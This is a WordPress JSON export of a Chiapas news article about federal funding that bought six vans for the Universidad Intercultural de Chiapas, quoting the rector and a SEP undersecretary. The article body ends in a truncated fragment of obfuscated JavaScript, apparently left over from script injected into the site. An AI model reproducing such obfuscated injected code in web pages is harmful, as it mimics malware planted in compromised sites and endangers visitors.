{"id":16448,"date":"2024-07-02T03:31:21","date_gmt":"2024-07-02T03:31:21","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16448"},"modified":"2024-07-02T03:31:22","modified_gmt":"2024-07-02T03:31:22","slug":"reconocer-dionicio-toledo-apoyo-de-la-federacion-a-la-unich","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16448","title":{"rendered":"Reconocer Dionicio Toledo, apoyo de la federaci\u00f3n a la UNICH"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/WhatsApp-Image-2024-07-01-at-6.01.31-PM-1-1024x576.jpeg\" alt=\"\" class=\"wp-image-16449\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/WhatsApp-Image-2024-07-01-at-6.01.31-PM-1-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/WhatsApp-Image-2024-07-01-at-6.01.31-PM-1-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/WhatsApp-Image-2024-07-01-at-6.01.31-PM-1-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/WhatsApp-Image-2024-07-01-at-6.01.31-PM-1-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/07\/WhatsApp-Image-2024-07-01-at-6.01.31-PM-1.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>1 de julio del 2024. Tuxtla Guti\u00e9rrez.- San Crist\u00f3bal de Las Casas.- Con la presencia de Luciano Concheiro B\u00f3rquez, Subsecretario de Educaci\u00f3n Superior y Mar\u00eda de los \u00c1ngeles Gordillo Casta\u00f1eda, coordinadora t\u00e9cnica de Planeaci\u00f3n y Gesti\u00f3n Administrativa de la SEP, se realiz\u00f3 la entrega de Parque Vehicular a la Sede Central San Crist\u00f3bal y Unidades Acad\u00e9micas Multidisciplinarias de Oxchuc, Las Margaritas, Yajal\u00f3n y Valle del Tulij\u00e1, de la Universidad Intercultural de Chiapas(UNICH).<\/p>\n\n\n\n<p>Durante su intervenci\u00f3n, el rector de la UNICH, Dionicio Toledo Hern\u00e1ndez, explic\u00f3 que estas unidades, fueron adquiridas con recursos autorizados del Programa de Expansi\u00f3n de la Educaci\u00f3n Media Superior y Superior <a href=\"PROEXES\">Tipo Superior<\/a> Ejercicio Fiscal 2023, como una necesidad para que los j\u00f3venes de esta universidad, puedan acudir a sus trabajos de vinculaci\u00f3n, viajes de estudios, encuentros, entre otras actividades acad\u00e9micas.<\/p>\n\n\n\n<p>\u201cTrabajamos para que estos recursos puedan llegar en beneficio de la comunidad estudiantil y del personal directivo y acad\u00e9mico de nuestra universidad. Cuando iniciamos en la rector\u00eda hicimos el recorrido a las unidades acad\u00e9micas, y estamos fortaleciendo desde el incremento de la matr\u00edcula, plantillas docentes, la direccionalidad de los recursos que vienen de la federaci\u00f3n, reconocer estos grandes aportes y presupuestos que ha aportado la federaci\u00f3n hacia nuestra Universidad Intercultural de Chiapas \u201c, dijo.<\/p>\n\n\n\n<p>Durante el acto protocolario de la entrega de estos 6 veh\u00edculos tipo urvans, agradeci\u00f3 el apoyo de acompa\u00f1amiento del gobernador del estado Rutilio Escand\u00f3n Cadenas, y de la Secretar\u00eda de Educaci\u00f3n, Rosa Aid\u00e9 Dom\u00ednguez Ochoa, \u201cque siempre est\u00e1n al pendientes de este proceso de gesti\u00f3n de manera conjunta en beneficio del estudiantado\u201d.<\/p>\n\n\n\n<p>En este sentido, Luciano Concheiro B\u00f3rquez, afirm\u00f3 que la entrega de estas unidades, transforma la labor de la comunidad universitaria, ya que son con actividades de campo, y sin un medio de movilidad \u201cnuestro modelo no funciona\u201d.<\/p>\n\n\n\n<p>\u201cCon este fortalecimiento, vamos a permitirnos el traslado de grupos de estudiantes y docentes en viajes de corto y mediano recorrido, para realizar todas las actividades de investigaci\u00f3n, visitas escolares\u201d, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 1 de julio del 2024. Tuxtla Guti\u00e9rrez.- San Crist\u00f3bal de Las Casas.- Con la presencia de Luciano Concheiro B\u00f3rquez, Subsecretario de Educaci\u00f3n Superior y Mar\u00eda de los \u00c1ngeles Gordillo Casta\u00f1eda, coordinadora t\u00e9cnica de Planeaci\u00f3n y Gesti\u00f3n Administrativa de la SEP, se realiz\u00f3 la entrega de Parque Vehicular a la Sede Central San &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16449,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-16448","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16448","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16448"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16448\/revisions"}],"predecessor-version":[{"id":16450,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16448\/revisions\/16450"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16449"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16448"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16448"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16448"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}